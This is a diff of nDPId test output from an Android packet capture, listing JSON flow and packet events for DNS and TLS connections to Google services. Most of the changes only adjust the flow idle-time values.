+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1582454871855,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871855,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0wixAAEAGtnfAqAIQ2O8meID2AbsYfvWpTGBDc4AQAVe7FAAAAQEICv\/\/N4fDx9w1"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1582454871867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871867,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8+7cAAHUGxias2RRMwKgCEAG7qn7jcCu5pd5966AS6yBHnwAAAgQFZAQCCArp2ZEZ\/\/83gAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1582454871873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871873,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0SmtAAEAGbHvAqAIQrNkUTKp+Abul3n3r43AruoAQAVdf2wAAAQEICv\/\/N4vp2ZEZ"} +00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871814,"flow_last_seen":1582454871879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":594,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1582454871879,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871839,"flow_last_seen":1582454871880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871880,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1582454871881,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1582454871881,"pkt":"xiwDYGpkTGr2n\/YnCABFAABErDBAAEARCRfAqAIQwKgCAZtQADUAMNjjuKUBAAABAAAAAAAAB2FuZHJvaWQKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="} 00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871881,"flow_last_seen":1582454871881,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871881,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871829,"flow_last_seen":1582454871890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871890,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871839,"flow_last_seen":1582454871911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871911,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871814,"flow_last_seen":1582454871913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1582454871913,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":408,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871829,"flow_last_seen":1582454871890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871890,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871839,"flow_last_seen":1582454871911,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871911,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871814,"flow_last_seen":1582454871913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1582454871913,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1582454871920,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1582454871920,"pkt":"TGr2n\/YnxiwDYGpkCABFAABUFXQAAEAR38PAqAIBwKgCEAA1m1AAQNQ0uKWBgAABAAEAAAAAB2FuZHJvaWQKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAARcABKzZFgo="} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454871920,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.10"}} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":447,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871829,"flow_last_seen":1582454871933,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871933,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871947,"flow_last_seen":1582454871947,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871947,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1582454871947,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871947,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8i1NAAEAGKc3AqAIQrNkWCq1WAbtFj7zOAAAAAKAC\/\/\/ZVgAAAgQFtAQCCAr\/\/zedAAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1582454871972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871972,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8OOwAAHYGhjSs2RYKwKgCEAG7rVbtvX7+RY+8z6AS6yDuawAAAgQFZAQCCAq7R9gE\/\/83nQEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1582454871974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871974,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0i1RAAEAGKdTAqAIQrNkWCq1WAbtFj7zP7b1+\/4AQAVcGrAAAAQEICv\/\/N6S7R9gE"} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871947,"flow_last_seen":1582454872014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872014,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872015,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"semanticlocation-pa.googleapis.com","ja3":"33490b1d5377580b19f7f9b5849d7991","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":447,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871829,"flow_last_seen":1582454871933,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871933,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871947,"flow_last_seen":1582454871947,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871947,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1582454871947,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871947,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8i1NAAEAGKc3AqAIQrNkWCq1WAbtFj7zOAAAAAKAC\/\/\/ZVgAAAgQFtAQCCAr\/\/zedAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1582454871972,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871972,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8OOwAAHYGhjSs2RYKwKgCEAG7rVbtvX7+RY+8z6AS6yDuawAAAgQFZAQCCAq7R9gE\/\/83nQEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1582454871974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871974,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0i1RAAEAGKdTAqAIQrNkWCq1WAbtFj7zP7b1+\/4AQAVcGrAAAAQEICv\/\/N6S7R9gE"} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871947,"flow_last_seen":1582454872014,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872014,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872015,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"semanticlocation-pa.googleapis.com","ja3":"33490b1d5377580b19f7f9b5849d7991","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1582454872021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454872021,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrFBAAEARCPrAqAIQwKgCAdv4ADUALYKcD\/4BAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="} 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1582454872022,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454872022,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRBMwAAEAR8G7AqAIBwKgCEAA12\/gAPTZ5D\/6BgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872022,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872031,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454872031,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8+JhAAEAGvkXAqAIQrNkUTKqEAbsc\/M8rAAAAAKAC\/\/\/0BgAAAgQFtAQCCAr\/\/zezAAAAAAEDAwg="} 